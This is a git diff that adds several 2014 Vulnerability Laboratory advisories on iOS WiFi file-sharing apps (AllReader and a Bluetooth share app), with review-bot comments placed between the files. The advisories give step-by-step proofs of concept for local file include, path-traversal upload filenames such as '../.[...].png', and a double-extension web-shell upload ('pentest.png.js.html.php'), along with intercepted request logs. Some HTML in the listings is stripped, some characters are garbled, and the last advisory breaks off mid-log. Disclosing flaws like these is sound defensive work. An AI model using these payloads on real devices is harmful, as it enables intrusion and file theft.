name/path value. The attacker is able to inject +the local file include request by usage of the available `wifi interface`. + +Remote attackers are also able to exploit the filename validation issue in combination with persistent injected script codes to execute +different local malicious attacks requests. The attack vector is on the application-side of the wifi service and the request method to +inject is POST. + +The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) +count of 7.0. Exploitation of the local file include web vulnerability requires no privileged web-application user account but low +user interaction. Successful exploitation of the local file include web vulnerability results in mobile application or connected +device component compromise. 
+ + +Request Method(s): + [+] [POST] + +Vulnerable Service(s): + [+] WiFi Sharing + +Vulnerable Module(s): + [+] UPLOAD_FILE_TO_FOLDER + +Vulnerable File(s): + [+] uploadfile + +Vulnerable Parameter(s): + [+] filename + +Affected Module(s): + [+] Index File/Folder Dir Listing (http://localhost:8080/) + + +Proof of Concept (PoC): +======================= +The local file/path include web vulnerability can be exploited by local network attackers with low user interaction. For security demonstration or +to reproduce the vulnerability follow the provided information and steps below to continue. + +PoC: UPLOAD FILE TO FOLDER +Current Folder: Document +Uploading files + 68-2.png + %20./../[LOCAL FILE/PATH INCLUDE WEB VULNERABILITY!].filetype + night-city-pictures-24.jpg + + + + + +--- PoC Session Logs [POST] --- +Status: 200[OK] + POST http://localhost:8080/uploadfile Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[-1] Mime Type[application/x-unknown-content-type] + Request Header: + Host[localhost:8080] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://localhost:8080/UPLOAD_FILE_TO_FOLDER] + Connection[keep-alive] + POST-Daten: + POST_DATA[-----------------------------189051727528435 +Content-Disposition: form-data; name="upload1"; filename="<%20./../[LOCAL FILE/PATH INCLUDE WEB VULNERABILITY!].filetype" +Content-Type: image/x + + +Reference(s): +http://localhost:8080/uploadfile +http://localhost:8080/UPLOAD_FILE_TO_FOLDER + + +Solution - Fix & Patch: +======================= +The vulnerability can be patched by a secure restriction and parse of the vulnerable filename value in the multi upload module. +Restrict the input name value and encode the name output value in the index listing module to prevent further local file include attacks. 
+Do not forget to disallow multiple file extensions which could result in the bypass or the filetype validation. + + +Security Risk: +============== +The security risk of the local file include web vulnerability in the upload to file index module is estimated as high. + + +Credits & Authors: +================== +Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either +expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers +are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even +if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation +of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break +any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. 
+ +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com +Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com +Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to +electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by +Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website +is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact +(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. + + Copyright ? 2014 | Vulnerability Laboratory [Evolution Security] + + + +-- +VULNERABILITY LABORATORY RESEARCH TEAM +DOMAIN: www.vulnerability-lab.com +CONTACT: research@vulnerability-lab.com + + diff --git a/platforms/ios/webapps/33631.txt b/platforms/ios/webapps/33631.txt new file mode 100755 index 000000000..e7fa689f5 --- /dev/null +++ b/platforms/ios/webapps/33631.txt 
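Review bot: The score stated for this advisory is inconsistent: the Common Vulnerability Scoring System section gives `6.9`, while the Technical Details paragraph says the issue has a "cvss ... count of 7.0"; one of the two should be corrected before the file is indexed. The Solution section reads as an output-encoding fix, but what the PoC demonstrates is a path-like multipart `filename` value reaching the file-index listing, so the remediation text should say that the upload handler must normalize the stored name server-side (drop directory components and reject `..` segments) before writing it, with encoding in the listing as a second layer rather than the primary control. The `Gr??e des Inhalts` fragments in the session log look like non-ASCII characters lost in an encoding conversion before commit, so it is worth checking that the file was committed as UTF-8. `Exploitation Technique: Local` also disagrees with the body's repeated "remote attackers" wording.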
@@ -0,0 +1,213 @@
+Document Title:
+===============
+AllReader v1.0 iOS - Multiple Web Vulnerabilities
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1269
+
+
+Release Date:
+=============
+2014-05-26
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1269
+
+
+Common Vulnerability Scoring System:
+====================================
+6.8
+
+
+Product & Service Introduction:
+===============================
+Professional helper on your iPhone, iPad, and iPod that will allow you to read virtually any file type right from your device: PDF, DJVU, DOC, XLS, PPT, TXT,
+Image, Video files, whether these are important documents, books, student materials, notes or you can just view pictures and video clips.
+Supported devices: iPhone 3Gs/4/4S/5, iPod Touch 4/5, all iPad generations.
+
+(Copy of the Homepage: https://itunes.apple.com/us/app/all-reader./id871830567 )
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Research Team discovered a local file include web vulnerability in the official AllReader v1.0 iOS mobile application by Wylsacom Waytt.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2014-05-26: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Wylsacom Waytt
+Product: AllReader - iOS Mobile Application 1.0
+
+
+Exploitation Technique:
+=======================
+Local
+
+
+Severity Level:
+===============
+High
+
+
+Technical Details & Description:
+================================
+A local file include web vulnerability has been discovered in the official AllReader v1.0 iOS mobile application by Wylsacom Waytt.
+The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific
+path commands to compromise the mobile web-application.
+ +The web vulnerability is located in the `filename` value of the `file upload` module. Remote attackers are able to inject own files with +malicious `filename` values in the `file upload` POST method request to compromise the mobile web-application. The local file/path +execution occcurs in the index file/path dir list context. The attacker is able to inject the malicious file/path include request by usage +of the available `wifi interface`. + +Remote attackers are also able to exploit the filename validation issue in combination with persistent injected script codes to execute +different local malicious attacks requests. The attack vector is on the application-side of the allreader wifi service and the request +method to inject is POST. + +The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count +of 6.8. Exploitation of the local file include web vulnerability requires no privileged web-application user account withoutuser interaction. +Successful exploitation of the local file include web vulnerability results in mobile application or connected device component compromise. + + +Request Method(s): + [+] [POST] + +Vulnerable Service(s): + [+] WiFi Transfer UI + +Vulnerable Module(s): + [+] Upload File + +Vulnerable Parameter(s): + [+] filename + +Affected Module(s): + [+] Index File/Folder Dir Listing (http://localhost:8080/) + + +Proof of Concept (PoC): +======================= +The local file/path include web vulnerability in the web-server can be exploited by local attackers without auth or user interaction. +For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. + +Manual steps to reproduce the security vulnerability ... +1. Install the ios application (iphone or ipad) +2. Start it and move to the settings menu, activate the wifi server +3. 
Go to another computer in the same network and surf to the local web-server url (localhost:8080) +4. Upload a random image +5. Tamper the session information by an intercept, exchange the vulnerable `filename` value with own malicious file or path request +Note: Payloads can be combined with script code to successful execute different other attacks like hijacking, phishing and co. +5. Submit the settings and refresh the file dir index list +6. The code execution occurs in the file dir index list of ios app +7. Successful reproduce of the local fil/path include web vulnerability + +PoC: File Dir Index List - http://localhost:8080/ +Files from

Files from

+The following files are hosted live from the iPhone's Docs folder.

..
+<../.[LOCAL FILE/PATH INCLUDE WEB VULNERABILITY!].png (0.5 Kb, 2014-05-26 11:49:04 +0000)
+

+

+ + +--- POC SESSION LOGS [POST] --- +Status: 200[OK] +POST http://localhost:8080/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[821] Mime Type[application/x-unknown-content-type] + Request Header: + Host[localhost:8080] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://localhost:8080/] + Connection[keep-alive] + POST-Daten: + POST_DATA[-----------------------------102203247921326 +Content-Disposition: form-data; name="file"; filename="../.[LOCAL FILE/PATH INCLUDE WEB VULNERABILITY!].png" +Content-Type: image/png + +-- RESPONSE HEADER +Status: 200[OK] +GET http://localhost:8080/../.[LOCAL FILE/PATH INCLUDE WEB VULNERABILITY!] Load Flags[LOAD_DOCUMENT_URI ] Gr??e des Inhalts[721] Mime Type[application/x-unknown-content-type] + Request Header: + Host[localhost:8080] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://localhost:8080/] + Connection[keep-alive] + Response Header: + Accept-Ranges[bytes] + Content-Length[721] + Date[Mo., 26 Mai 2014 11:49:06 GMT] + + + +Reference(s): +http://localhost:8080/ +http://localhost:8080/../x + + +Solution - Fix & Patch: +======================= +The vulnerability can be patched by a secure parse and encode of the vulnerale filename value in the upload module POST method request. +The file dir index list needs to encode malicious filenames even of the input is already parsed to prevent further attacks via file/path value. +Restrict, filter or use a secure exception-handling to disallow special chars, html tags or script codes. 
+ + +Security Risk: +============== +The security risk of the local file/path include web vulnerability is estimated as high(-). + + +Credits & Authors: +================== +Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either +expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers +are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even +if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation +of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break +any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. + +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com +Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com +Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to +electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by +Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website +is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact +(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. + + Copyright ? 2014 | Vulnerability Laboratory [Evolution Security] + +-- +VULNERABILITY LABORATORY RESEARCH TEAM +DOMAIN: www.vulnerability-lab.com +CONTACT: research@vulnerability-lab.com + + diff --git a/platforms/ios/webapps/33632.txt b/platforms/ios/webapps/33632.txt new file mode 100755 index 000000000..c23b15ca7 --- /dev/null +++ b/platforms/ios/webapps/33632.txt 
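Review bot: The document title `AllReader v1.0 iOS - Multiple Web Vulnerabilities` promises several issues, but the body documents a single local file include in the upload `filename` value, so the title should be narrowed (the 33630 advisory in this same commit uses `File Include Vulnerability`) or the missing findings added. In the manual steps the numbering repeats `5.` twice, and the PoC index listing between `Files from` and the `--- POC SESSION LOGS` block appears to have had its HTML markup stripped, leaving only orphaned fragments, so the rendered example no longer shows what the listing looked like. As in 33630, `Gr??e des Inhalts` in the session log suggests non-ASCII bytes were lost before commit, and `Exploitation Technique: Local` contradicts the "remote attackers" wording in Technical Details. The Solution paragraph has typos (`vulnerale`, "even of the input" for "even if the input") and would be clearer stating that the primary fix is server-side canonicalization of the stored filename, with output encoding in the listing as a secondary control.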
@@ -0,0 +1,400 @@ +Document Title: +=============== +Bluetooth Photo-File Share v2.1 iOS - Multiple Web Vulnerabilities + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1270 + + +Release Date: +============= +2014-05-30 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1270 + + +Common Vulnerability Scoring System: +==================================== +7 + + +Product & Service Introduction: +=============================== +This is the best bluetooth sharing and file transfer app in app store. Transfer photo, video, contacts and any file between two +iPhone, iPad and/or iPod Touches over bluetooth connection. Requires iPhone 3G or later or 2nd generation iPod Touch or later. +Does not require any 3G or WiFi connection. Unlike some other bluetooth photo sharing apps only can transfer photo from Photo +Library, The bluetooth share not only can transfer photo, but also it can transfer video from Photo Library. + +( Copy of the Homepage: https://itunes.apple.com/de/app/bluetooth-photo-video-musik/id590369016 ) + + +Abstract Advisory Information: +============================== +The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official Bluetooth Photo/Video /Musik /Contact /File Share v2.1 iOS mobile application. 
+ + +Vulnerability Disclosure Timeline: +================================== +2014-05-30: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +Tao Xu +Product: Bluetooth Photo /Video /Musik /Contact /File Share - iOS Mobile Web Application 2.1 + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Technical Details & Description: +================================ +1.1 +A local file include web vulnerability has been discovered in the official Bluetooth Photo/Video /Musik /Contact /File Share v2.1 iOS mobile application. +The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands to +compromise the mobile web-application. + +The web vulnerability is located in the `filename` value of the `data upload` module. Remote attackers are able to inject own files with malicious `filename` +values in the `file upload` POST method request to compromise the mobile web-application. The local file/path execution occcurs in the file/path dir index +list web context. The attacker is able to inject the malicious file/path include request by usage of the available `filesharing > wifi-transfer interface`. + +Local attackers are also able to exploit the filename validation issue in combination with persistent injected script codes to execute different local malicious +attacks requests. The attack vector is on the application-side of the allreader wifi service and the request method to inject is POST. The security risk of the +local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.8. + +Exploitation of the local file include web vulnerability requires no privileged web-application user account withoutuser interaction. 
+Successful exploitation of the local file include web vulnerability results in mobile application or connected device component compromise. + +Request Method(s): + [+] [POST] + +Vulnerable Module(s): + [+] Filesharing > Wi-fi Transfer UI + +Vulnerable Function(s): + [+] Upload + +Vulnerable Parameter(s): + [+] filename + +Affected Module(s): + [+] Index File Dir List (http://localhost:8080/) + + + + +1.2 +An arbitrary file upload web vulnerability has been discovered in the official Bluetooth Photo/Video /Musik /Contact /File Share v2.1 iOS mobile application. +The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the system validation and compromise the web-server. + +The vulnerability is located in the upload file module. Remote attackers are able to upload a php or js web-shells by a rename of the file with multiple extensions +to bypass the file restriction mechanism. The attacker uploads for example a web-shell with the following name and extension `pentest.png.js.html.php`. After the +upload the attacker needs to open the file in the web application. He deletes the .png file extension and can access the application with elevated access rights. +The security risk of the arbitrary file upload web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.1. + +Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privilege application user account with password. +Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells. 
+ + +Request Method(s): + [+] [POST] + +Vulnerable Module(s): + [+] Filesharing > Wi-fi Transfer UI + +Vulnerable Function(s): + [+] Upload + +Vulnerable Parameter(s): + [+] filename (multiple extensions) + +Affected Module(s): + [+] Index File Dir Listing (http://localhost:8080) + + +Proof of Concept (PoC): +======================= +1.1 +The local file include web vulnerability can be exploited by local attackers without privileged application user account or user interaction. +For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. + +Manual steps to reproduce the vulnerability ... + +1. Install the mobile application to your apple ios device (iphone/ipad) +2. Open the application locally and activate the wifi transfer & export function +3. Login to another remote device in the same network to the application interface (localhost:8080) +4. Choose a random file to upload, start a session tamper to intercept and press the submit button +5. Change in the POST method request of the upload module the vulnerable filename value +Note: Include for example a local device component file or mobile application path as value +6. Continue the request, refresh the index page and download the local file or request unauthorized the mobile device path +7. Successful reproduce of the local file include web vulnerability! + + +PoC: Wi-fi Transfer (UI) - Index File Dir Listing + +
+
+ + + + + +
File NameFile Size
+<./[LOCAL FILE/PATH INCLUDE VULNERABILITY VIA FILENAME VALUE]">.png538.00B
+
+

+ + +--- POC SESSION LOGS [POST] (LFI) --- +19:32:08.304[128ms][total 128ms] Status: 302[Found] +POST http://localhost:8080/files Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[67] Mime Type[text/html] + Request Header: + Host[localhost:8080] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://localhost:8080/] + Connection[keep-alive] + POST-Daten: + POST_DATA[-----------------------------284152263011599 +Content-Disposition: form-data; name="newfile"; filename="